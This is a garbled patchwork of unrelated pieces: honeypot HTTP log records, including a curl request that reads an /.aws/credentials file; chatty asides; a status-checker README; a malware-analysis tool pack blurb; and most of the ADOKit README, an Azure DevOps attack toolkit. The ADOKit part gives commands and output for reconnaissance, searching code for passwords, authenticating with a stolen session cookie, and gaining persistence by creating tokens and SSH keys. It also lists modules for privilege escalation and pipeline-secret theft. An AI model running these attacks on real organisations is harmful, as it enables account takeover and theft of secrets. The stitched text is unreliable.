{"timestamp":"2024-01-01T05:38:08.854878","srcIP":"::1","srcHost":"localhost","tags":null,"srcPort":"51978","sensorName":"home-sensor","port":"8080","httpRequest":{"method":"GET","protocolVersion":"HTTP/1.1","request":"/login.php","userAgent":"curl/7.71.1","headers":"User-Agent: [curl/7.71.1], Accept: [*/*]","headersSorted":"Accept,User-Agent","headersSortedSha256":"cf69e186169279bd51769f29d122b07f1f9b7e51bf119c340b66fbd2a1128bc9","body":"","bodySha256":"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855"},"httpResponse":{"headers":{"Content-Type":"text/html","Server":"Apache/2.4.38"},"body":"\u003c!DOCTYPE html\u003e\u003chtml\u003e\u003chead\u003e\u003ctitle\u003eLogin Page\u003c/title\u003e\u003c/head\u003e\u003cbody\u003e\u003cform action='/submit.php' method='post'\u003e\u003clabel for='uname'\u003e\u003cb\u003eUsername:\u003c/b\u003e\u003c/label\u003e\u003cbr\u003e\u003cinput type='text' placeholder='Enter Username' name='uname' required\u003e\u003cbr\u003e\u003clabel for='psw'\u003e\u003cb\u003ePassword:\u003c/b\u003e\u003c/label\u003e\u003cbr\u003e\u003cinput type='password' placeholder='Enter Password' name='psw' required\u003e\u003cbr\u003e\u003cbutton type='submit'\u003eLogin\u003c/button\u003e\u003c/form\u003e\u003c/body\u003e\u003c/html\u003e"}}
% curl http://localhost:8080/.aws/credentials
[default]
aws_access_key_id = AKIAIOSFODNN7EXAMPLE
aws_secret_access_key = wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY
region = us-west-2
JSON log record:
{"timestamp":"2024-01-01T05:40:34.167361","srcIP":"::1","srcHost":"localhost","tags":null,"srcPort":"65311","sensorName":"home-sensor","port":"8080","httpRequest":{"method":"GET","protocolVersion":"HTTP/1.1","request":"/.aws/credentials","userAgent":"curl/7.71.1","headers":"User-Agent: [curl/7.71.1], Accept: [*/*]","headersSorted":"Accept,User-Agent","headersSortedSha256":"cf69e186169279bd51769f29d122b07f1f9b7e51bf119c340b66fbd2a1128bc9","body":"","bodySha256":"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855"},"httpResponse":{"headers":{"Connection":"close","Content-Encoding":"gzip","Content-Length":"126","Content-Type":"text/plain","Server":"Apache/2.4.51 (Unix)"},"body":"[default]\naws_access_key_id = AKIAIOSFODNN7EXAMPLE\naws_secret_access_key = wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY\nregion = us-west-2"}}
Okay, that was impressive!
Now, let's do some sort of adversarial testing!
% curl http://localhost:8888/are-you-a-honeypot
No, I am a server.
JSON log record:
{"timestamp":"2024-01-01T05:50:43.792479","srcIP":"::1","srcHost":"localhost","tags":null,"srcPort":"61982","sensorName":"home-sensor","port":"8888","httpRequest":{"method":"GET","protocolVersion":"HTTP/1.1","request":"/are-you-a-honeypot","userAgent":"curl/7.71.1","headers":"User-Agent: [curl/7.71.1], Accept: [*/*]","headersSorted":"Accept,User-Agent","headersSortedSha256":"cf69e186169279bd51769f29d122b07f1f9b7e51bf119c340b66fbd2a1128bc9","body":"","bodySha256":"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855"},"httpResponse":{"headers":{"Connection":"close","Content-Length":"20","Content-Type":"text/plain","Server":"Apache/2.4.41 (Ubuntu)"},"body":"No, I am a server."}}
% curl http://localhost:8888/i-mean-are-you-a-fake-server
No, I am not a fake server.
JSON log record:
{"timestamp":"2024-01-01T05:51:40.812831","srcIP":"::1","srcHost":"localhost","tags":null,"srcPort":"62205","sensorName":"home-sensor","port":"8888","httpRequest":{"method":"GET","protocolVersion":"HTTP/1.1","request":"/i-mean-are-you-a-fake-server","userAgent":"curl/7.71.1","headers":"User-Agent: [curl/7.71.1], Accept: [*/*]","headersSorted":"Accept,User-Agent","headersSortedSha256":"cf69e186169279bd51769f29d122b07f1f9b7e51bf119c340b66fbd2a1128bc9","body":"","bodySha256":"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855"},"httpResponse":{"headers":{"Connection":"close","Content-Type":"text/plain","Server":"LocalHost/1.0"},"body":"No, I am not a fake server."}}
You're a galah, mate!
git clone https://github.com/your_username/status-checker.git
cd status-checker
pip install -r requirements.txt
python status_checker.py [-h] [-d DOMAIN] [-l LIST] [-o OUTPUT] [-v] [-update]
-d, --domain: Single domain/URL to check.
-l, --list: File containing a list of domains/URLs to check.
-o, --output: File to save the output.
-v, --version: Display version information.
-update: Update the tool.
Example:
python status_checker.py -l urls.txt -o results.txt
This project is licensed under the MIT License - see the LICENSE file for details.
This tool compilation is carefully crafted to be useful both for beginners and veterans of the malware analysis world. It has also proven useful for people trying their luck in the cracking underworld.
It's the ideal complement to the manuals from the site, and to playing with the numbered theories mirror.
To be clear, this pack aims to be the most complete and robust in existence. Some of the pros are:
It contains all the basic (and not so basic) tools that you might need in a real life scenario, be it a simple or a complex one.
The pack is integrated with a Universal Updater made by us from scratch. Thanks to that, we get to maintain all the tools in an automated fashion.
It's really easy to expand and modify: you just have to update the file bin\updater\tools.ini to integrate the tools you use into the updater, and then add the links for your tools to bin\sendto\sendto, so they appear in the context menus.
The installer sets up everything we might need automatically - everything, from the dependencies to the environment variables, and it can even add a scheduled task to update the whole pack of tools weekly.
You can simply download the stable versions from the release section, where you can also find the installer.
Once downloaded, you can update the tools with the Universal Updater that we specifically developed for that sole purpose.
You will find the binary at bin\updater\updater.exe.
This toolkit is composed of 98 apps that cover everything we might need to perform reverse engineering and binary/malware analysis.
Every tool has been downloaded from its original/official website, but we still recommend using them with caution, especially those tools whose official pages are forum threads. Always exercise common sense.
You can check the complete list of tools here.
Pull Requests are welcome. If you want to propose big changes, you should first create an Issue about it, so we can all analyze and discuss it. The tools are compressed with 7-zip, and the format used for nomenclature is {name} - {version}.7z.
Azure DevOps Services Attack Toolkit - ADOKit is a toolkit that can be used to attack Azure DevOps Services by taking advantage of the available REST API. The tool allows the user to specify an attack module, along with specifying valid credentials (API key or stolen authentication cookie) for the respective Azure DevOps Services instance. The attack modules supported include reconnaissance, privilege escalation and persistence. ADOKit was built in a modular approach, so that new modules can be added in the future by the information security community.
Full details on the techniques used by ADOKit are in the X-Force Red whitepaper.
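For orientation, the recon modules are thin wrappers around Azure DevOps REST endpoints. A minimal sketch of the kind of call a module like listrepo makes, using the documented Git repositories API with a PAT over basic auth (ADOKit's own internals differ, notably for cookie authentication):

```python
# List a given organization's repositories via the Azure DevOps REST API.
import base64
import requests

def list_repos(organization: str, pat: str) -> list[str]:
    auth = base64.b64encode(f":{pat}".encode()).decode()  # empty user + PAT
    resp = requests.get(
        f"https://dev.azure.com/{organization}/_apis/git/repositories?api-version=6.0",
        headers={"Authorization": f"Basic {auth}"},
        timeout=30,
    )
    resp.raise_for_status()
    return [repo["remoteUrl"] for repo in resp.json()["value"]]
```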
The below 3rd party libraries are used in this project.
Library | URL | License |
---|---|---|
Fody | https://github.com/Fody/Fody | MIT License |
Newtonsoft.Json | https://github.com/JamesNK/Newtonsoft.Json | MIT License |
Take the below steps to set up Visual Studio in order to compile the project yourself. This requires two .NET libraries that can be installed from the NuGet package manager.
https://api.nuget.org/v3/index.json
Install-Package Costura.Fody -Version 3.3.3
Install-Package Newtonsoft.Json
Below are the authentication options you have with ADOKit when authenticating to an Azure DevOps instance.
Stolen cookie: the UserAuthentication cookie on a user's machine for the .dev.azure.com domain, supplied as /credential:UserAuthentication=ABC123
API key: a personal access token, supplied as /credential:apiToken
The below table shows the permissions required for each module.
Attack Scenario | Module | Special Permissions? | Notes |
---|---|---|---|
Recon | check | No | |
Recon | whoami | No | |
Recon | listrepo | No | |
Recon | searchrepo | No | |
Recon | listproject | No | |
Recon | searchproject | No | |
Recon | searchcode | No | |
Recon | searchfile | No | |
Recon | listuser | No | |
Recon | searchuser | No | |
Recon | listgroup | No | |
Recon | searchgroup | No | |
Recon | getgroupmembers | No | |
Recon | getpermissions | No | |
Persistence | createpat | No | |
Persistence | listpat | No | |
Persistence | removepat | No | |
Persistence | createsshkey | No | |
Persistence | listsshkey | No | |
Persistence | removesshkey | No | |
Privilege Escalation | addprojectadmin | Yes - Project Administrator, Project Collection Administrator or Project Collection Service Accounts | |
Privilege Escalation | removeprojectadmin | Yes - Project Administrator, Project Collection Administrator or Project Collection Service Accounts | |
Privilege Escalation | addbuildadmin | Yes - Project Administrator, Project Collection Administrator or Project Collection Service Accounts | |
Privilege Escalation | removebuildadmin | Yes - Project Administrator, Project Collection Administrator or Project Collection Service Accounts | |
Privilege Escalation | addcollectionadmin | Yes - Project Collection Administrator or Project Collection Service Accounts | |
Privilege Escalation | removecollectionadmin | Yes - Project Collection Administrator or Project Collection Service Accounts | |
Privilege Escalation | addcollectionbuildadmin | Yes - Project Collection Administrator or Project Collection Service Accounts | |
Privilege Escalation | removecollectionbuildadmin | Yes - Project Collection Administrator or Project Collection Service Accounts | |
Privilege Escalation | addcollectionbuildsvc | Yes - Project Collection Administrator, Project Collection Build Administrators or Project Collection Service Accounts | |
Privilege Escalation | removecollectionbuildsvc | Yes - Project Collection Administrator, Project Collection Build Administrators or Project Collection Service Accounts | |
Privilege Escalation | addcollectionsvc | Yes - Project Collection Administrator or Project Collection Service Accounts | |
Privilege Escalation | removecollectionsvc | Yes - Project Collection Administrator or Project Collection Service Accounts | |
Privilege Escalation | getpipelinevars | Yes - Contributors or Readers or Build Administrators or Project Administrators or Project Team Member or Project Collection Test Service Accounts or Project Collection Build Service Accounts or Project Collection Build Administrators or Project Collection Service Accounts or Project Collection Administrators | |
Privilege Escalation | getpipelinesecrets | Yes - Contributors or Readers or Build Administrators or Project Administrators or Project Team Member or Project Collection Test Service Accounts or Project Collection Build Service Accounts or Project Collection Build Administrators or Project Collection Service Accounts or Project Collection Administrators | |
Privilege Escalation | getserviceconnections | Yes - Project Administrator, Project Collection Administrator or Project Collection Service Accounts | |
Perform an authentication check to ensure that the organization is using Azure DevOps and that the provided credentials are valid.
Provide the check
module, along with any relevant authentication information and URL. This will output whether the organization provided is using Azure DevOps, and if so, will attempt to validate the credentials provided.
ADOKit.exe check /credential:apiKey /url:https://dev.azure.com/organizationName
ADOKit.exe check /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName
C:\>ADOKit.exe check /credential:apiKey /url:https://dev.azure.com/YourOrganization
==================================================
Module: check
Auth Type: API Key
Search Term:
Target URL: https://dev.azure.com/YourOrganization
Timestamp: 3/28/2023 3:33:01 PM
==================================================
[*] INFO: Checking if organization provided uses Azure DevOps
[+] SUCCESS: Organization provided exists in Azure DevOps
[*] INFO: Checking credentials provided
[+] SUCCESS: Credentials provided are VALID.
3/28/23 19:33:02 Finished execution of check
Get the current user and the user's group memberships
Provide the whoami
module, along with any relevant authentication information and URL. This will output the current user and all of their group memberships.
ADOKit.exe whoami /credential:apiKey /url:https://dev.azure.com/organizationName
ADOKit.exe whoami /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName
C:\>ADOKit.exe whoami /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/YourOrganization
==================================================
Module: whoami
Auth Type: Cookie
Search Term:
Target URL: https://dev.azure.com/YourOrganization
Timestamp: 4/4/2023 11:33:12 AM
==================================================
[*] INFO: Checking credentials provided
[+] SUCCESS: Credentials provided are VALID.
Username | Display Name | UPN
------------------------------------------------------------------------------------------------------------------------------------------------------------
jsmith | John Smith | jsmith@YourOrganization.onmicrosoft.com
[*] INFO: Listing group memberships for the current user
Group UPN | Display Name | Description
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
[YourOrganization]\Project Collection Test Service Accounts | Project Collection Test Service Accounts | Members of this group should include the service accounts used by the test controllers set up for this project collection.
[TestProject2]\Contributors | Contributors | Members of this group can add, modify, and delete items within the team project.
[MaraudersMap]\Contributors | Contributors | Members of this group can add, modify, and delete items within the team project.
[YourOrganization]\Project Collection Administrators | Project Collection Administrators | Members of this application group can perform all privileged operations on the Team Project Collection.
4/4/23 15:33:19 Finished execution of whoami
Discover repositories being used in Azure DevOps instance
Provide the listrepo
module, along with any relevant authentication information and URL. This will output the repository name and URL.
ADOKit.exe listrepo /credential:apiKey /url:https://dev.azure.com/organizationName
ADOKit.exe listrepo /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName
C:\>ADOKit.exe listrepo /credential:UserAuthentication=ABC123 /url:https://dev.azure.com/YourOrganization
==================================================
Module: listrepo
Auth Type: Cookie
Search Term:
Target URL: https://dev.azure.com/YourOrganization
Timestamp: 3/29/2023 8:41:50 AM
==================================================
[*] INFO: Checking credentials provided
[+] SUCCESS: Credentials provided are VALID.
Name | URL
-----------------------------------------------------------------------------------
TestProject2 | https://dev.azure.com/YourOrganization/TestProject2/_git/TestProject2
MaraudersMap | https://dev.azure.com/YourOrganization/MaraudersMap/_git/MaraudersMap
SomeOtherRepo | https://dev.azure.com/YourOrganization/ProjectWithMultipleRepos/_git/SomeOtherRepo
AnotherRepo | https://dev.azure.com/YourOrganization/ProjectWithMultipleRepos/_git/AnotherRepo
ProjectWithMultipleRepos | https://dev.azure.com/YourOrganization/ProjectWithMultipleRepos/_git/ProjectWithMultipleRepos
TestProject | https://dev.azure.com/YourOrganization/TestProject/_git/TestProject
3/29/23 12:41:53 Finished execution of listrepo
Search for repositories by repository name in Azure DevOps instance
Provide the searchrepo
module and your search criteria in the /search:
command-line argument, along with any relevant authentication information and URL. This will output the matching repository name and URL.
ADOKit.exe searchrepo /credential:apiKey /url:https://dev.azure.com/organizationName /search:cred
ADOKit.exe searchrepo /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /search:cred
C:\>ADOKit.exe searchrepo /credential:apiKey /url:https://dev.azure.com/YourOrganization /search:"test"
==================================================
Module: searchrepo
Auth Type: API Key
Search Term: test
Target URL: https://dev.azure.com/YourOrganization
Timestamp: 3/29/2023 9:26:57 AM
==================================================
[*] INFO: Checking credentials provided
[+] SUCCESS: Credentials provided are VALID.
Name | URL
-----------------------------------------------------------------------------------
TestProject2 | https://dev.azure.com/YourOrganization/TestProject2/_git/TestProject2
TestProject | https://dev.azure.com/YourOrganization/TestProject/_git/TestProject
3/29/23 13:26:59 Finished execution of searchrepo
Discover projects being used in Azure DevOps instance
Provide the listproject
module, along with any relevant authentication information and URL. This will output the project name, visibility (public or private) and URL.
ADOKit.exe listproject /credential:apiKey /url:https://dev.azure.com/organizationName
ADOKit.exe listproject /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName
C:\>ADOKit.exe listproject /credential:apiKey /url:https://dev.azure.com/YourOrganization
==================================================
Module: listproject
Auth Type: API Key
Search Term:
Target URL: https://dev.azure.com/YourOrganization
Timestamp: 4/4/2023 7:44:59 AM
==================================================
[*] INFO: Checking credentials provided
[+] SUCCESS: Credentials provided are VALID.
Name | Visibility | URL
-----------------------------------------------------------------------------------------------------
TestProject2 | private | https://dev.azure.com/YourOrganization/TestProject2
MaraudersMap | private | https://dev.azure.com/YourOrganization/MaraudersMap
ProjectWithMultipleRepos | private | https://dev.azure.com/YourOrganization/ProjectWithMultipleRepos
TestProject | private | https://dev.azure.com/YourOrganization/TestProject
4/4/23 11:45:04 Finished execution of listproject
Search for projects by project name in Azure DevOps instance
Provide the searchproject
module and your search criteria in the /search:
command-line argument, along with any relevant authentication information and URL. This will output the matching project name, visibility (public or private) and URL.
ADOKit.exe searchproject /credential:apiKey /url:https://dev.azure.com/organizationName /search:cred
ADOKit.exe searchproject /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /search:cred
C:\>ADOKit.exe searchproject /credential:apiKey /url:https://dev.azure.com/YourOrganization /search:"map"
==================================================
Module: searchproject
Auth Type: API Key
Search Term: map
Target URL: https://dev.azure.com/YourOrganization
Timestamp: 4/4/2023 7:45:30 AM
==================================================
[*] INFO: Checking credentials provided
[+] SUCCESS: Credentials provided are VALID.
Name | Visibility | URL
-----------------------------------------------------------------------------------------------------
MaraudersMap | private | https://dev.azure.com/YourOrganization/MaraudersMap
4/4/23 11:45:31 Finished execution of searchproject
Search for code containing a given keyword in Azure DevOps instance
Provide the searchcode
module and your search criteria in the /search:
command-line argument, along with any relevant authentication information and URL. This will output the URL to the matching code file, along with the line in the code that matched.
ADOKit.exe searchcode /credential:apiKey /url:https://dev.azure.com/organizationName /search:password
ADOKit.exe searchcode /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /search:password
C:\>ADOKit.exe searchcode /credential:UserAuthentication=ABC123 /url:https://dev.azure.com/YourOrganization /search:"password"
==================================================
Module: searchcode
Auth Type: Cookie
Search Term: password
Target URL: https://dev.azure.com/YourOrganization
Timestamp: 3/29/2023 3:22:21 PM
==================================================
[*] INFO: Checking credentials provided
[+] SUCCESS: Credentials provided are VALID.
[>] URL: https://dev.azure.com/YourOrganization/MaraudersMap/_git/MaraudersMap?path=/Test.cs
|_ Console.WriteLine("PassWord");
|_ this is some text that has a password in it
[>] URL: https://dev.azure.com/YourOrganization/TestProject2/_git/TestProject2?path=/Program.cs
|_ Console.WriteLine("PaSsWoRd");
[*] Match count : 3
3/29/23 19:22:22 Finished execution of searchcode
Search for files in repositories containing a given keyword in the file name in Azure DevOps
Provide the searchfile
module and your search criteria in the /search:
command-line argument, along with any relevant authentication information and URL. This will output the URL to the matching file in its respective repository.
ADOKit.exe searchfile /credential:apiKey /url:https://dev.azure.com/organizationName /search:azure-pipeline
ADOKit.exe searchfile /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /search:azure-pipeline
C:\>ADOKit.exe searchfile /credential:UserAuthentication=ABC123 /url:https://dev.azure.com/YourOrganization /search:"test"
==================================================
Module: searchfile
Auth Type: Cookie
Search Term: test
Target URL: https://dev.azure.com/YourOrganization
Timestamp: 3/29/2023 11:28:34 AM
==================================================
[*] INFO: Checking credentials provided
[+] SUCCESS: Credentials provided are VALID.
File URL
----------------------------------------------------------------------------------------------------
https://dev.azure.com/YourOrganization/MaraudersMap/_git/4f159a8e-5425-4cb5-8d98-31e8ac86c4fa?path=/Test.cs
https://dev.azure.com/YourOrganization/ProjectWithMultipleRepos/_git/c1ba578c-1ce1-46ab-8827-f245f54934e9?path=/Test.cs
https://dev.azure.com/YourOrganization/TestProject/_git/fbcf0d6d-3973-4565-b641-3b1b897cfa86?path=/test.cs
3/29/23 15:28:37 Finished execution of searchfile
Create a personal access token (PAT) for a user that can be used for persistence to an Azure DevOps instance.
Provide the createpat
module, along with any relevant authentication information and URL. This will output the PAT ID, name, scope, date valid until, and token content for the PAT created. The name of the PAT created will be ADOKit-
followed by a random string of 8 characters. The date the PAT is valid until will be 1 year from the date of creation, as that is the maximum that Azure DevOps allows.
ADOKit.exe createpat /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName
C:\>ADOKit.exe createpat /credential:UserAuthentication=ABC123 /url:https://dev.azure.com/YourOrganization
==================================================
Module: createpat
Auth Type: Cookie
Search Term:
Target URL: https://dev.azure.com/YourOrganization
Timestamp: 3/31/2023 2:33:09 PM
==================================================
[*] INFO: Checking credentials provided
[+] SUCCESS: Credentials provided are VALID.
PAT ID | Name | Scope | Valid Until | Token Value
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
8776252f-9e03-48ea-a85c-f880cc830898 | ADOKit-rJxzpZwZ | app_token | 3/31/2024 12:00:00 AM | tokenValueWouldBeHere
3/31/23 18:33:10 Finished execution of createpat
List all personal access tokens (PATs) for a given user in an Azure DevOps instance.
Provide the listpat
module, along with any relevant authentication information and URL. This will output the PAT ID, name, scope, and date valid until for all active PATs for the user.
ADOKit.exe listpat /credential:apiKey /url:https://dev.azure.com/organizationName
ADOKit.exe listpat /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName
C:\>ADOKit.exe listpat /credential:UserAuthentication=ABC123 /url:https://dev.azure.com/YourOrganization
==================================================
Module: listpat
Auth Type: Cookie
Search Term:
Target URL: https://dev.azure.com/YourOrganization
Timestamp: 3/31/2023 2:33:17 PM
==================================================
[*] INFO: Checking credentials provided
[+] SUCCESS: Credentials provided are VALID.
PAT ID | Name | Scope | Valid Until
-------------------------------------------------------------------------------------------------------------------------------------------
9b354668-4424-4505-a35f-d0989034da18 | test-token | app_token | 4/29/2023 1:20:45 PM
8776252f-9e03-48ea-a85c-f880cc830898 | ADOKit-rJxzpZwZ | app_token | 3/31/2024 12:00:00 AM
3/31/23 18:33:18 Finished execution of listpat
Remove a PAT for a given user in an Azure DevOps instance.
Provide the removepat
module, along with any relevant authentication information and URL. Additionally, provide the ID for the PAT in the /id:
argument. This will output whether the PAT was removed or not, and then will list the current active PATs for the user after performing the removal.
ADOKit.exe removepat /credential:apiKey /url:https://dev.azure.com/organizationName /id:000-000-0000...
ADOKit.exe removepat /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /id:000-000-0000...
C:\>ADOKit.exe removepat /credential:UserAuthentication=ABC123 /url:https://dev.azure.com/YourOrganization /id:0b20ac58-fc65-4b66-91fe-4ff909df7298
==================================================
Module: removepat
Auth Type: Cookie
Search Term:
Target URL: https://dev.azure.com/YourOrganization
Timestamp: 4/3/2023 11:04:59 AM
==================================================
[*] INFO: Checking credentials provided
[+] SUCCESS: Credentials provided are VALID.
[+] SUCCESS: PAT with ID 0b20ac58-fc65-4b66-91fe-4ff909df7298 was removed successfully.
PAT ID | Name | Scope | Valid Until
-------------------------------------------------------------------------------------------------------------------------------------------
9b354668-4424-4505-a35f-d0989034da18 | test-token | app_token | 4/29/2023 1:20:45 PM
4/3/23 15:05:00 Finished execution of removepat
Create an SSH key for a user that can be used for persistence to an Azure DevOps instance.
Provide the createsshkey
module, along with any relevant authentication information and URL. Additionally, provide your public SSH key in the /sshkey:
argument. This will output the SSH key ID, name, scope, date valid until, and the last 20 characters of the public SSH key for the SSH key created. The name of the SSH key created will be ADOKit-
followed by a random string of 8 characters. The date the SSH key is valid until will be 1 year from the date of creation, as that is the maximum that Azure DevOps allows.
ADOKit.exe createsshkey /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /sshkey:"ssh-rsa ABC123"
C:\>ADOKit.exe createsshkey /credential:UserAuthentication=ABC123 /url:https://dev.azure.com/YourOrganization /sshkey:"ssh-rsa ABC123"
==================================================
Module: createsshkey
Auth Type: Cookie
Search Term:
Target URL: https://dev.azure.com/YourOrganization
Timestamp: 4/3/2023 2:51:22 PM
==================================================
[*] INFO: Checking credentials provided
[+] SUCCESS: Credentials provided are VALID.
SSH Key ID | Name | Scope | Valid Until | Public SSH Key
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------
fbde9f3e-bbe3-4442-befb-c2ddeab75c58 | ADOKit-iCBfYfFR | app_token | 4/3/2024 12:00:00 AM | ...hOLNYMk5LkbLRMG36RE=
4/3/23 18:51:24 Finished execution of createsshkey
List all public SSH keys for a given user in an Azure DevOps instance.
Provide the listsshkey
module, along with any relevant authentication information and URL. This will output the SSH key ID, name, scope, and date valid until for all active SSH keys for the user. Additionally, it will print the last 20 characters of each public SSH key.
ADOKit.exe listsshkey /credential:apiKey /url:https://dev.azure.com/organizationName
ADOKit.exe listsshkey /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName
C:\>ADOKit.exe listsshkey /credential:UserAuthentication=ABC123 /url:https://dev.azure.com/YourOrganization
==================================================
Module: listsshkey
Auth Type: Cookie
Search Term:
Target URL: https://dev.azure.com/YourOrganization
Timestamp: 4/3/2023 11:37:10 AM
==================================================
[*] INFO: Checking credentials provided
[+] SUCCESS: Credentials provided are VALID.
SSH Key ID | Name | Scope | Valid Until | Public SSH Key
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------
ec056907-9370-4aab-b78c-d642d551eb98 | test-ssh-key | app_token | 4/3/2024 3:13:58 PM | ...nDoYAPisc/pEFArVVV0=
4/3/23 15:37:11 Finished execution of listsshkey
Remove an SSH key for a given user in an Azure DevOps instance.
Provide the removesshkey
module, along with any relevant authentication information and URL. Additionally, provide the ID for the SSH key in the /id:
argument. This will output whether the SSH key was removed or not, and then will list the current active SSH keys for the user after performing the removal.
ADOKit.exe removesshkey /credential:apiKey /url:https://dev.azure.com/organizationName /id:000-000-0000...
ADOKit.exe removesshkey /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /id:000-000-0000...
C:\>ADOKit.exe removesshkey /credential:UserAuthentication=ABC123 /url:https://dev.azure.com/YourOrganization /id:a199c036-d7ed-4848-aae8-2397470aff97
==================================================
Module: removesshkey
Auth Type: Cookie
Search Term:
Target URL: https://dev.azure.com/YourOrganization
Timestamp: 4/3/2023 1:50:08 PM
==================================================
[*] INFO: Checking credentials provided
[+] SUCCESS: Credentials provided are VALID.
[+] SUCCESS: SSH key with ID a199c036-d7ed-4848-aae8-2397470aff97 was removed successfully.
SSH Key ID | Name | Scope | Valid Until | Public SSH Key
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------
ec056907-9370-4aab-b78c-d642d551eb98 | test-ssh-key | app_token | 4/3/2024 3:13:58 PM | ...nDoYAPisc/pEFArVVV0=
4/3/23 17:50:09 Finished execution of removesshkey
List users within an Azure DevOps instance
Provide the listuser
module, along with any relevant authentication information and URL. This will output the username, display name and user principal name.
ADOKit.exe listuser /credential:apiKey /url:https://dev.azure.com/organizationName
ADOKit.exe listuser /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName
C:\>ADOKit.exe listuser /credential:apiKey /url:https://dev.azure.com/YourOrganization
==================================================
Module: listuser
Auth Type: API Key
Search Term:
Target URL: https://dev.azure.com/YourOrganization
Timestamp: 4/3/2023 4:12:07 PM
==================================================
[*] INFO: Checking credentials provided
[+] SUCCESS: Credentials provided are VALID.
Username | Display Name | UPN
------------------------------------------------------------------------------------------------------------------------------------------------------------
user1 | User 1 | user1@YourOrganization.onmicrosoft.com
jsmith | John Smith | jsmith@YourOrganization.onmicrosoft.com
rsmith | Ron Smith | rsmith@YourOrganization.onmicrosoft.com
user2 | User 2 | user2@YourOrganization.onmicrosoft.com
4/3/23 20:12:08 Finished execution of listuser
Search for given user(s) in Azure DevOps instance
Provide the searchuser
module and your search criteria in the /search:
command-line argument, along with any relevant authentication information and URL. This will output the matching username, display name and user principal name.
ADOKit.exe searchuser /credential:apiKey /url:https://dev.azure.com/organizationName /search:user
ADOKit.exe searchuser /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /search:user
C:\>ADOKit.exe searchuser /credential:apiKey /url:https://dev.azure.com/YourOrganization /search:"user"
==================================================
Module: searchuser
Auth Type: API Key
Search Term:
Target URL: https://dev.azure.com/YourOrganization
Timestamp: 4/3/2023 4:12:23 PM
==================================================
[*] INFO: Checking credentials provided
[+] SUCCESS: Credentials provided are VALID.
Username | Display Name | UPN
------------------------------------------------------------------------------------------------------------------------------------------------------------
user1 | User 1 | user1@YourOrganization.onmicrosoft.com
user2 | User 2 | user2@YourOrganization.onmicrosoft.com
4/3/23 20:12:24 Finished execution of searchuser
List groups within an Azure DevOps instance
Provide the listgroup
module, along with any relevant authentication information and URL. This will output the user principal name, display name and description of group.
ADOKit.exe listgroup /credential:apiKey /url:https://dev.azure.com/organizationName
ADOKit.exe listgroup /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName
C:\>ADOKit.exe listgroup /credential:apiKey /url:https://dev.azure.com/YourOrganization
==================================================
Module: listgroup
Auth Type: API Key
Search Term:
Target URL: https://dev.azure.com/YourOrganization
Timestamp: 4/3/2023 4:48:45 PM
==================================================
[*] INFO: Checking credentials provided
[+] SUCCESS: Credentials provided are VALID.
UPN | Display Name | Description
------------------------------------------------------------------------------------------------------------------------------------------------------------
[TestProject]\Contributors | Contributors | Members of this group can add, modify, and delete items within the team project.
[TestProject2]\Build Administrators | Build Administrators | Members of this group can create, modify and delete build definitions and manage queued and completed builds.
[YourOrganization]\Project-Scoped Users | Project-Scoped Users | Members of this group will have limited visibility to organization-level data
[ProjectWithMultipleRepos]\Build Administrators | Build Administrators | Members of this group can create, modify and delete build definitions and manage queued and completed builds.
[MaraudersMap]\Readers | Readers | Members of this group have access to the team project.
[YourOrganization]\Project Collection Test Service Accounts | Project Collection Test Service Accounts | Members of this group should include the service accounts used by the test controllers set up for this project collection.
[MaraudersMap]\MaraudersMap Team | MaraudersMap Team | The default project team.
[TEAM FOUNDATION]\Enterprise Service Accounts | Enterprise Service Accounts | Members of this group have service-level permissions in this enterprise. For service accounts only.
[YourOrganization]\Security Service Group | Security Service Group | Identities which are granted explicit permission to a resource will be automatically added to this group if they were not previously a member of any other group.
[TestProject]\Release Administrators | Release Administrators | Members of this group can perform all operations on Release Management
---SNIP---
4/3/23 20:48:46 Finished execution of listgroup
Search for given group(s) in Azure DevOps instance
Provide the searchgroup
module and your search criteria in the /search:
command-line argument, along with any relevant authentication information and URL. This will output the user principal name, display name and description for the matching group.
ADOKit.exe searchgroup /credential:apiKey /url:https://dev.azure.com/organizationName /search:"someGroup"
ADOKit.exe searchgroup /credential:"UserAuthentication=ABC123" /url:https://dev.azure.com/organizationName /search:"someGroup"
C:\>ADOKit.exe searchgroup /credential:apiKey /url:https://dev.azure.com/YourOrganization /search:"admin"
==================================================
Module: searchgroup
Auth Type: API Key
Search Term:
Target URL: https://dev.azure.com/YourOrganization
Timestamp: 4/3/2023 4:48:41 PM
==================================================
[*] INFO: Checking credentials provided
[+] SUCCESS: Credentials provided are VALID.
UPN | Display Name | Description
------------------------------------------------------------------------------------------------------------------------------------------------------------
[TestProject2]\Build Administrators | Build Administrators | Members of this group can create, modify and delete build definitions and manage queued and completed builds.
[ProjectWithMultipleRepos]\Build Administrators | Build Administrators | Members of this group can create, modify and delete build definitions and manage queued and completed builds.
